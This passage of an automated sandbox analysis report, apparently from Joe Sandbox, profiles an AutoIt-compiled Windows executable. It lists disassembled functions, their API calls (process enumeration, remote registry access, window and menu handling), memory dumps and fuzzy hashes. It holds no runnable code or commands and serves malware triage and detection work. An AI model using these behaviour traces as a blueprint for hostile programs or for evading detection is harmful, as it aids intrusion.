                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                      • API String ID: 2323102230-1173974218
                                                                                                                                                                                      • Opcode ID: c4846784ee2ca9afad0ab2dea647cf7a883071296a9a8c414bd7674df3cf2f98
                                                                                                                                                                                      • Instruction ID: 42f668a0e1797cde5b3a2c93be8c4901fb5ceedd3e3dddb2f3ded0e63a83d5ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: c4846784ee2ca9afad0ab2dea647cf7a883071296a9a8c414bd7674df3cf2f98
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B3141B1805218AACF60EFB4E845BDDB7BCAF49304F5045EAE509E3141EB309B89CB65
                                                                                                                                                                                      Function 00942FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                                                                                      • Opcode ID: f2dc27c3a14045991382a22692ab9c51e97d1785c88f9ca0673b3938d3eda0dc
                                                                                                                                                                                      • Instruction ID: 7450d412ec385976377454024a954863daace2ff43204b1c7413aafddb4c8014
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2dc27c3a14045991382a22692ab9c51e97d1785c88f9ca0673b3938d3eda0dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97213B3220522177D731B734AD02FBB73ECAF95344F908526F48587196EB959A82C391
                                                                                                                                                                                      Function 009417C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094180D
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00941833
                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00941836
                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00941857
                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00941860
                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0094187A
                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00941888
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                      • Opcode ID: 5faa17fb3cb88aad1b908470678927faf3a16b7367fda98dfac79f073b15ffbf
                                                                                                                                                                                      • Instruction ID: 6c8eaccd344328caa61800ab4ab1b06f52a173682eafec4030f8eab5cc2fc557
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5faa17fb3cb88aad1b908470678927faf3a16b7367fda98dfac79f073b15ffbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65218335615204AFDB10ABB8DC88DBE77ECEF09360B408125F915DB3A1EA74EC819B64
                                                                                                                                                                                      Function 0096A0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0091C657
                                                                                                                                                                                        • Part of subcall function 0091C619: GetStockObject.GDI32(00000011), ref: 0091C66B
                                                                                                                                                                                        • Part of subcall function 0091C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0091C675
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0096A13B
                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0096A148
                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0096A153
                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0096A162
                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0096A16E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                      • Opcode ID: 66be9f37d048f511e06cbff33691446b1ad8a7ae5a4d62e5c4ef7e161524f122
                                                                                                                                                                                      • Instruction ID: 89d8763267f0eb0f243b2bbacba3e0a4a2ff01e7e40478119ef8a2ffe0d0f943
                                                                                                                                                                                      • Opcode Fuzzy Hash: 66be9f37d048f511e06cbff33691446b1ad8a7ae5a4d62e5c4ef7e161524f122
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911C4B115421DBEEF115F60CC86EEB7F5DEF097A8F014215FA08A6090C6729C21DBA0
                                                                                                                                                                                      Function 0091C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0091C6C0
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0091C701
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0091C729
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0091C856
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0091C86F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                      • Opcode ID: 39b29c2f24952d30d88a4556bef768f855766730adf8fa9fd0876885c359aaa5
                                                                                                                                                                                      • Instruction ID: 18d5265821fe626f26027cd6c523270e0862fbf3ac1a49a0a192c7d875314fd8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 39b29c2f24952d30d88a4556bef768f855766730adf8fa9fd0876885c359aaa5
                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B16979A0024ADBDF10CFA8C5807EDB7B1FF08310F14956AEC59EB650EB34A980CB64
                                                                                                                                                                                      Function 00949569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3253778849-0
                                                                                                                                                                                      • Opcode ID: 37bb014bc863f8f3b18eb2b2da793edad7c61a4e9ddc16a2fab03f0e803c29a4
                                                                                                                                                                                      • Instruction ID: f55b775ef907951149287dffcfe8d9848f4b8a0d8424164768374237cf578260
                                                                                                                                                                                      • Opcode Fuzzy Hash: 37bb014bc863f8f3b18eb2b2da793edad7c61a4e9ddc16a2fab03f0e803c29a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: C061AD3060021AAFCB05EF60CC82FFF77A9AF84318F054559F85A6B1E2EB34A905CB50
                                                                                                                                                                                      Function 00961AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00961B09
                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00961B17
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00961B45
                                                                                                                                                                                        • Part of subcall function 0092297D: __wsplitpath_helper.LIBCMT ref: 009229BD
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00961B5A
                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00961BD0
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00961BE2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1380811348-0
                                                                                                                                                                                      • Opcode ID: c1460f4aefc0233455a6ec443336706bc067c1954f4b65ee8b8884ab569f4a73
                                                                                                                                                                                      • Instruction ID: e8a842e5b14b516b2bcdbb4a81a6bf455673cc4ad937aaa3b0908a4d3d76d777
                                                                                                                                                                                      • Opcode Fuzzy Hash: c1460f4aefc0233455a6ec443336706bc067c1954f4b65ee8b8884ab569f4a73
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC515D71508304AFD720EF24D885FABB7ECAF88754F04491EF58597291EB70EA44CBA2
                                                                                                                                                                                      Function 00962EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                        • Part of subcall function 00963AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00962AA6,?,?), ref: 00963B0E
                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00962FA0
                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00962FE0
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00963003
                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0096302C
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096306F
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0096307C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4046560759-0
                                                                                                                                                                                      • Opcode ID: 2a5e2bb372d10e9b45ec48a3b62dbd2aba8442f06ba674a909b835393e867e4c
                                                                                                                                                                                      • Instruction ID: 12d54730158fd565c526a51d841affd5618dda5fb363ceb24b814afbf522642a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a5e2bb372d10e9b45ec48a3b62dbd2aba8442f06ba674a909b835393e867e4c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E514671219200AFC704EF64C885E6BBBF9FF88304F04891DF585872A1DB71EA09CB52
                                                                                                                                                                                      Function 0091DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscpy$_wcscat
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2037614760-0
                                                                                                                                                                                      • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                                      • Instruction ID: d212851eef2d4a58b1c20ae516c8d7879677ee6f552365e63bc41855f74d9f20
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B513531B05129AACB11AF98E441AFEB7B5EF54310F50884AF5C1AB281DB785FC2D7D4
                                                                                                                                                                                      Function 00942ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00942AF6
                                                                                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 00942B68
                                                                                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 00942BC3
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00942BED
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00942C3A
                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00942C68
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1101466143-0
                                                                                                                                                                                      • Opcode ID: f2f0ff28a85999c4f28d6bd756f88e7e8f0ef0bbf063a0a859a1244ba5f52beb
                                                                                                                                                                                      • Instruction ID: 15458a746e11a8c7a0499c46e294c754d4a6c541eefb4fb8bd432f6dc7faa6a1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f2f0ff28a85999c4f28d6bd756f88e7e8f0ef0bbf063a0a859a1244ba5f52beb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 465146B5A00209AFDB14CF58C880EAAB7B8FF8C314B258559F959DB350E734E951CBA0
                                                                                                                                                                                      Function 009682DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetMenu.USER32(?), ref: 0096833D
                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00968374
                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0096839C
                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0096840B
                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00968419
                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0096846A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                                      • Opcode ID: 804c61ec3525e494bd33be42a756559cade0ced798adbf8995e39a3869fc2403
                                                                                                                                                                                      • Instruction ID: 7a8b63f5192651ff1bb323a379a26231ddf9d4c9cdebda55035827dcee2c1763
                                                                                                                                                                                      • Opcode Fuzzy Hash: 804c61ec3525e494bd33be42a756559cade0ced798adbf8995e39a3869fc2403
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D518D75A00219EFCF11EFA4C841AAEB7B9EF88710F144559E911BB3A1DF74AE418B90
                                                                                                                                                                                      Function 009454E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 0094552E
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00945579
                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00945599
                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 009455CD
                                                                                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 0094562B
                                                                                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0094565C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3311875123-0
                                                                                                                                                                                      • Opcode ID: 394289efe4cdaea8df5d0707c06198d0ed3579d177592f71f33cf8a1417aaca7
                                                                                                                                                                                      • Instruction ID: fa63c83c0817d6d6f170cbe70fc86ac70e1be71d6e790a24e53f492934e2af86
                                                                                                                                                                                      • Opcode Fuzzy Hash: 394289efe4cdaea8df5d0707c06198d0ed3579d177592f71f33cf8a1417aaca7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4851E1B0600B09EFDF24CFA8D888FADBBF9AF55318F524119F4159B2A2D3709944CB51
                                                                                                                                                                                      Function 0091B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0091AF8E
                                                                                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0091B1C1
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0091B225
                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0091B242
                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0091B253
                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0091B29D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1827037458-0
                                                                                                                                                                                      • Opcode ID: 4ec1a43fd6545cc9a2920d82a47be9b5b84d5471e605bc7c82a88ddf3033aafc
                                                                                                                                                                                      • Instruction ID: 108d8215608a81a73aff50a600347cf5315cbccd019e75f308f5217bb028d63b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ec1a43fd6545cc9a2920d82a47be9b5b84d5471e605bc7c82a88ddf3033aafc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3716083049FD711DF24CC94FBA7BE9EF56320F040A28F9A5872A2C7309C89EB61
                                                                                                                                                                                      Function 0096E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                                                      Download Yara Rule
